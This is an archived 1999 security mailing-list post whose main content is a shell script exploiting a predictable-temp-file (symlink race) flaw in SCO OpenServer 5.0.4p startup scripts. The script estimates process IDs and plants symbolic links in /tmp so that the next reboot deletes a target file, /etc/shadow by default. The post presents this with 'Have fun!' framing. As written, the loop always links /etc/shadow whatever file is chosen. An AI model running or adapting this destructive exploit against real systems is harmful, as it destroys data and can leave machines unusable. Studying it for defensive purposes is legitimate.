Little exploit for startup scripts (SCO 5.0.4p).

From: leshka (leshkaat_private)
Date: Sun Mar 07 1999 - 04:07:23 PST

Next message: Marc Heuse: "Re: Linux /usr/bin/gnuplot overflow"

Previous message: Marc SCHAEFER: "Re: Linux /usr/bin/gnuplot overflow"
Next in thread: Jon Coyle: "Re: Little exploit for startup scripts (SCO 5.0.4p)."
Reply: Jon Coyle: "Re: Little exploit for startup scripts (SCO 5.0.4p)."
Reply: Peter van Dijk: "Re: Little exploit for startup scripts (SCO 5.0.4p)."
Reply: Taneli Leppä: "Re: Little exploit for startup scripts (SCO 5.0.4p)."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

#!/bin/sh
#
#                                   ... The punishment for inobedience ...
#                                                   (Cycle # 2)
#
#                This simple script can help to erase any file
#                 (SCO OpenServer Enterprise System v 5.0.4p).
#                                 Have fun !
#
#
#
#
# Some of "/etc/rc2.d" startup scripts create and then delete temporary files
# with  easily  predictable  names in "/tmp" directory.  Below there is a few
# interesting fragments of those nice scripts:
#
# S84rpcinit:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
#       /bin/rm -f /tmp/rpc.err$$
# ...
#       rm -rf /tmp/rpc$$
#
# S95nis:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$
#       /bin/rm -f /tmp/nis.err$$
# ...
#       rm -f /tmp/nis$$
#
# S85tcp:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
#       /bin/rm -f /tmp/ps.err$$
# ...
#       /bin/rm -f /tmp/tps$$
#
# S89nfs:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$
#       /bin/rm -f /tmp/nfs.err$$
# ...
#       rm -f /tmp/nfs$$
#
# Every time during the startup  such shell scripts creates files with names
# that include a process number of the above shell script. My numerous tests
# showed that the number is always the same with every reboot.  Pretty good,
# isn't it? One problem: how to determine the process number of such script?
# It's  so simple!  Child processes  of this script  have PID's  with values
# slightly over than  the parent's PID.  A little math and one gets it. Next
# step is  creating  a few symbolic links  to the victime file in the "/tmp"
# directory. During the next startup the victim file will be destroyed.
#
# P.S.  Looking forward  to getting published a complete SCO's list of names
# of such perfect shell scripts.
#
#                                   999,99*2
#
#                            ----------------------
#                ---------------------------------------------
#     -----------------   Dedicated to my beautiful lady   ------------------
#                ---------------------------------------------
#                            ----------------------
#
#       Leshka Zakharoff, 1999. E-mail: leshkaat_private (.ru)
#
#
#
if [ _$1 = "_" ]
then
    {
     echo -n "File to delete [/etc/shadow]:"
     read victim_file
     if [ _$victim_file = "_" ]
        then
            victim_file="/etc/shadow"
        fi
    }
else
    victim_file=$1
fi
pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf  $2 }'`
lastpid=`expr $pid - 30`
while [ $pid != $lastpid ]
      do
        pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid
      done
echo Done ! File \"$victim_file\" will be destroyed after the next reboot.

Next message: Marc Heuse: "Re: Linux /usr/bin/gnuplot overflow"
Previous message: Marc SCHAEFER: "Re: Linux /usr/bin/gnuplot overflow"
Next in thread: Jon Coyle: "Re: Little exploit for startup scripts (SCO 5.0.4p)."
Reply: Jon Coyle: "Re: Little exploit for startup scripts (SCO 5.0.4p)."
Reply: Peter van Dijk: "Re: Little exploit for startup scripts (SCO 5.0.4p)."
Reply: Taneli Leppä: "Re: Little exploit for startup scripts (SCO 5.0.4p)."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:38:10 PDT